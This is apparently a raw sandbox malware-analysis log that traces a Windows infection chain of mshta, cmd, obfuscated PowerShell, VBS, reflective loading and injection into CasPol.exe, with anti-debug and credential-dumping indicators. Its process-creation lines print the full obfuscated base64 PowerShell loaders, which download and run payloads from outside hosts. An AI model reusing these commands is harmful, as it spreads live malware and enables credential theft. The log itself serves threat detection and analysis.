                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: wscript.exe, 00000006.00000003.1769461848.0000000004D88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000007.00000002.2064343828.0000000006FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYYB
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWft Corporation1)0'
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1800035532.0000000007ED7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4133634036.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000007.00000002.2193735599.000000000BC91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4'^qemU
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-53331
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00442564 mov eax, dword ptr fs:[00000030h]12_2_00442564
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]12_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,12_2_00410B19
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434178
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00433B54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433CE7 SetUnhandledExceptionFilter,12_2_00433CE7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi32_7776.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi32_7776.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: AD1008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418764 mouse_event,12_2_00418764
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthineJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jerjrkpzicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfumrfrklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagcm0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejpsuzxtmtqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkzoc0dslhvpbnqgicagicagicagicagicagicagicagicagicagicagicagse1kagh1leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb4a0ipoycgicagicagicagicagicagicagicagicagicagicagicaglw5btuugicagicagicagicagicagicagicagicagicagicagicagillqiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzvnqqwnlicagicagicagicagicagicagicagicagicagicagicagihrkau5ydhjnicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjerjrkpzojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os8xmjevc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29pbmdvbi50suyilcikrw5wokfquerbvefcl3npbxbszwdyzwf0zmvhdhvyzxn3axrobmljzxnwzwfraw5ndghpbmdzzw50axjlbglmzwdvas52ylmildasmck7u1rhulqtu0xlzxaomyk7su52b2tflwv4ufjlu1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvwvc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29plnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jerjrkpzicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfumrfrklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagcm0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejpsuzxtmtqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkzoc0dslhvpbnqgicagicagicagicagicagicagicagicagicagicagicagse1kagh1leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb4a0ipoycgicagicagicagicagicagicagicagicagicagicagicaglw5btuugicagicagicagicagicagicagicagicagicagicagicagillqiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzvnqqwnlicagicagicagicagicagicagicagicagicagicagicagihrkau5ydhjnicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjerjrkpzojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os8xmjevc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29pbmdvbi50suyilcikrw5wokfquerbvefcl3npbxbszwdyzwf0zmvhdhvyzxn3axrobmljzxnwzwfraw5ndghpbmdzzw50axjlbglmzwdvas52ylmildasmck7u1rhulqtu0xlzxaomyk7su52b2tflwv4ufjlu1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvwvc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29plnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $capellmeister = 'jg5vbmv2ywx1yxrpdmugpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskzxj5dghyb3n0b211bsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhbpzwhvbgvzid0gjgvyexrocm9zdg9tdw0urg93bmxvywreyxrhkcrub25ldmfsdwf0axzlktskcgxhy29kzxjtyxrvdxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcgllag9szxmpoyriyw5kym94id0gjzw8qkftrty0x1nuqvjupj4noyr5zw1hbia9icc8pejbu0u2nf9ftkq+pic7jhbyzwxhy3kgpsakcgxhy29kzxjtyxrvdxmusw5kzxhpzigkymfuzgjveck7jgzhbwvkid0gjhbsywnvzgvybwf0b3vzlkluzgv4t2yojhllbwfuktskchjlbgfjesatz2ugmcatyw5kicrmyw1lzcatz3qgjhbyzwxhy3k7jhbyzwxhy3kgkz0gjgjhbmrib3gutgvuz3rooyr3axrlbmfnzw1vdca9icrmyw1lzcaticrwcmvsywn5oyrzb3bob21hbmlhyya9icrwbgfjb2rlcm1hdg91cy5tdwjzdhjpbmcojhbyzwxhy3ksicr3axrlbmfnzw1vdck7jgdyawzmaw4gpsatam9pbiaojhnvcghvbwfuawfjllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrzb3bob21hbmlhyy5mzw5ndggpxtskyxv0b3bsb2lkesa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojgdyawzmaw4poyrszwrlcml0zsa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgf1dg9wbg9pzhkpoyr1bmjpb3r1cmjhdgvkid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jhvuymlvdhvyymf0zwqusw52b2tlkcrudwxslcbakccwlzfeykjwl3ivzwuuzxrzyxavlzpzchr0accsicckymfja3njyxr0zxjpbmdzjywgjyriywnrc2nhdhrlcmluz3mnlcanjgjhy2tzy2f0dgvyaw5ncycsicddyxnqb2wnlcanjgjhy2tzy2f0dgvyaw5ncycsicckymfja3njyxr0zxjpbmdzjywnjgjhy2tzy2f0dgvyaw5ncycsjyriywnrc2nhdhrlcmluz3mnlcckymfja3njyxr0zxjpbmdzjywnjgjhy2tzy2f0dgvyaw5ncycsjyriywnrc2nhdhr